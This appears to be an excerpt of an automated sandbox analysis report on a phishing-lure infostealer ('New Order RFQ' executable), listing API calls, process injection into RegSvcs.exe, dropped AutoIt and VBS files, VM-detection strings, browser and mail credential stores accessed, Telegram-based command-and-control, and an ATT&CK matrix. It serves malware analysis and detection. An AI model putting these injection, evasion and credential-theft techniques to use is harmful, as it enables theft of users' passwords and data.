              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_007AF0F2
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_007AF3F3
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_007A37EF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_007A3B12
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_007ABCBC
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose | 1_2_00FE445A
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEC6D1 FindFirstFileW,FindClose | 1_2_00FEC6D1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 1_2_00FEC75C
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 1_2_00FEEF95
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 1_2_00FEF0F2
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 1_2_00FEF3F3
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 1_2_00FE37EF
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 1_2_00FE3B12
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 1_2_00FEBCBC
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_007449A0
              Source: RegSvcs.exe, 00000003.00000002.3638216843.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
              Source: alarmingness.exe, 0000000A.00000002.1318222088.0000000001194000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe
              Source: RegSvcs.exe, 0000000B.00000002.3638312956.00000000010A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06499548 LdrInitializeThunk, 3_2_06499548
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007B3F09 BlockInput, 0_2_007B3F09
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00743B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00743B3A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00775A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00775A7C
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00744B37 LoadLibraryA,GetProcAddress, 0_2_00744B37
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_01252148 mov eax, dword ptr fs:[00000030h] 0_2_01252148
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_012521A8 mov eax, dword ptr fs:[00000030h] 0_2_012521A8
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_01250B08 mov eax, dword ptr fs:[00000030h] 0_2_01250B08
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_01602530 mov eax, dword ptr fs:[00000030h] 1_2_01602530
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_016024D0 mov eax, dword ptr fs:[00000030h] 1_2_016024D0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_01600E90 mov eax, dword ptr fs:[00000030h] 1_2_01600E90
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_007980A9
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_0076A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0076A155
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_0076A124 SetUnhandledExceptionFilter, 0_2_0076A124
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FAA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00FAA155
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FAA124 SetUnhandledExceptionFilter, 1_2_00FAA124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 86B008
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B88008
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007987B1 LogonUserW, 0_2_007987B1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00743B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00743B3A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_007448D7
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A4C7F mouse_event, 0_2_007A4C7F
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00797CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00797CAF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_0079874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0079874B
              Source: New Order RFQ- 19A20060.exe, alarmingness.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: New Order RFQ- 19A20060.exe, alarmingness.exe | Binary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_0076862B cpuid 0_2_0076862B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00774E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00774E87
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00781E06 GetUserNameW, 0_2_00781E06
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00773F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00773F3A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007449A0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: alarmingness.exe | Binary or memory string: WIN_81
              Source: alarmingness.exe | Binary or memory string: WIN_XP
              Source: alarmingness.exe | Binary or memory string: WIN_XPe
              Source: alarmingness.exe | Binary or memory string: WIN_VISTA
              Source: alarmingness.exe | Binary or memory string: WIN_7
              Source: alarmingness.exe | Binary or memory string: WIN_8
              Source: alarmingness.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8012, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007B6283
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007B6747
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FF6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00FF6283
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FF6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00FF6747
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 1 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
              Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 31 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 127 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 11 Masquerading | LSA Secrets | 231 Security Software Discovery | SSH | 3 Clipboard Data | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
              Behavior Graph ID: 1634995  Sample: New Order RFQ- 19A20060.exe  Startdate: 11/03/2025  Architecture: WINDOWS  Score: 100

              Start
                DNS/IP: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
                reallyfreegeoip.org -> Tries to detect the country of the analysis system (by using the IP)
                api.telegram.org -> Uses the Telegram API (likely for C&C communication)
                started: New Order RFQ- 19A20060.exe
                  dropped: C:\Users\user\AppData\...\alarmingness.exe, PE32
                  Signatures: Binary is likely a compiled AutoIt script file
                  started: alarmingness.exe
                    dropped: C:\Users\user\AppData\...\alarmingness.vbs, data
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 2 other signatures
                    started: RegSvcs.exe
                      DNS/IP: api.telegram.org 149.154.167.220, 443, 49751, 49756 TELEGRAMRU United Kingdom; checkip.dyndns.com 193.122.6.168, 49713, 49718, 49721 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.112.1, 443, 49714, 49716 CLOUDFLARENETUS United States
                started: wscript.exe
                  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  started: alarmingness.exe
                    Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                    started: RegSvcs.exe
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
